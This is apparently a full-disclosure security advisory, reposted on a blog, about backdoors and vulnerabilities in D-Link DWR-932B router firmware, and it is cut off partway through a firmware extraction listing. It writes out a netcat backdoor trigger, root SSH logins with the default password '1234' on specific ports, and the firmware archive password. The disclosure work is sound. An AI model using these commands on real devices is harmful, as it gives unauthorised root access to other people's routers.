Hello, Following the advisory posted to FD and Buqtraq about the Dlink DWR-932B router, the complete version on analyzing the security on the corrected firmware for Dlink 932B LTE routers is posted here: http://ift.tt/2ks4OAs Please find a text-only version below sent to security mailing lists. === text-version of the advisory === An update on this post: MITRE has provided me with CVE numbers. CVE-2016-10177 for #1 (Backdoor accounts) CVE-2016-10178 for #2 (Backdoor) CVE-2016-10179 for #3 (hardcoded WPS PIN) CVE-2016-10180 for #4 (WPS PIN generation based on srand(time(0)) seeding) CVE-2016-10181 for #5 (qmiweb leaks information) CVE-2016-10182 for #6 (qmiweb allows command injection with ` characters) CVE-2016-10183 for #7 (qmiweb allows directory listing with ../ traversal) CVE-2016-10184 for #8 (qmiweb allows file reading with ..%2f traversal) CVE-2016-10185 for #9 (A secure_mode=no line exists in /var/miniupnpd.conf) CVE-2016-10186 for #10 (/var/miniupnpd.conf has no deny rules) Although D-link did not acknowledge all the vulnerabilities on its products, it released a new firmware on Oct 19, 2016 (DWR-932_fw_revB_2_03_eu_en_20161011.zip) that should fix several RCEs and backdoors. According to D-Link, there is no vulnerability as long as "potential attackers cannot connect to the secure wi-fi network"[1] - does it mean the product is secure as long as there are no attackers? A reader will note that D-Link did have a full advisory with PoCs for more than 100 days while taking no actions before public disclosure[2] and he/she will surely be able to verify the vulnerabilities by downloading an affected firmware and reversing the binaries (see my blog post for details). D-Link did not make any effort to contact the security researcher even after the initial advisory was published, but it posted its official answers and patches on their website that the security researcher found "by chance". [1] - http://ift.tt/2l1VdNp [2] - Report Timeline @ http://ift.tt/2deyBYo However, the corrected firmware still appears to have the backdoor in execution. The only security patches they made were: 1. renaming /sbin/telnetd to /sbin/xxlnetd (so the appmgr backdoor cannot be used by an attacker), 2. dropbear is now listening to port 47980/tcp or to port "999999999/tcp" instead of 22/tcp (still with root/1234). The appmgr backdoor is still present and running but ineffective (as /sbin/telnetd doesn't exist anymore): root@kali:~$ echo -ne "HELODBG" | nc -u 192.168.1.1 39889 <- will NOT start a telnetd on port 23/tcp because /sbin/telnetd was removed Interesting fact: Starting Dropbear with port 999999999/tcp will result in dropbear using the port 51711/tcp instead (999999999 & 0xFFFF). So, an attacker can still use the backdoor access to continue to root the device. With SSH: root@kali:~$ ssh -l root -p 47980 192.168.1.1 <- will provide a root shell with "1234" as a password. OR root@kali:~$ ssh -l root -p 51711 192.168.1.1 <- will provide a root shell with "1234" as a password. Following the reaction from D-Link and the lack of quality of the security patches, I finally advise users to trash their affected routers and I encourage security researchers to review security patches provided from D-Link instead of blindly trusting them. Note that future 0day vulnerabilities regarding D-Link products may be released at my will without coordinated disclosure ("Full disclosure"). "ALTERNATIVE FACT" - backdoor access are still present inside the new firmware: I would like to thank Gianni Carabelli for finding the password of the zip file provided by D-Link. root@kali:~# wget http://ift.tt/2kXyu9s root@kali:~# sha256sum DWR-932_fw_revB_2_03_eu_en_20161011.zip # in case of a modification of this file by D-link fb721979b235c9da9a9b8e505767ce04410b8c7f5035a73ac2c4cc0b9cada3bd DWR-932_fw_revB_2_03_eu_en_20161011.zip root@kali:~# dd if=DWR-932_fw_revB_2_03_eu_en_20161011.zip of=firmware.zip bs=64 skip=1 993106+1 records in 993106+1 records out 63558829 bytes (64 MB) copied, 1.29239 s, 49.2 MB/s root@kali:~# mkdir output && cd output && 7z x -pbeUT9Z ../firmware.zip root@kali:~/output# 7z x -pbeUT9Z firmware.zip 7-Zip 9.20 Copyright (c) 1999-2010 Igor Pavlov 2010-11-18 p7zip Version 9.20 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,1 CPU) Processing archive: ../firmware.zip Extracting 02.03EU Extracting 2K-cksum.txt Extracting 2K-mdm-image-mdm9625.yaffs2 Extracting appsboot.mbn Extracting mba.mbn Extracting mdm-image-boot-mdm9625.img Extracting mdm-image-mdm9625.yaffs2 Extracting mdm-recovery-image-boot-mdm9625.img Extracting mdm-recovery-image-mdm9625.yaffs2 Extracting mdm9625-usr-image.usrfs.yaffs2 Extracting qdsp6sw.mbn Extracting rpm.mbn Extracting sbl1.mbn Extracting tz.mbn Extracting wdt.mbn Everything is Ok Files: 15 Size: 145018347 Compressed: 63558829 root@kali:~/output# ls -latr total 141640 -rw
Source: Gmail -> IFTTT-> Blogger
No comments:
Post a Comment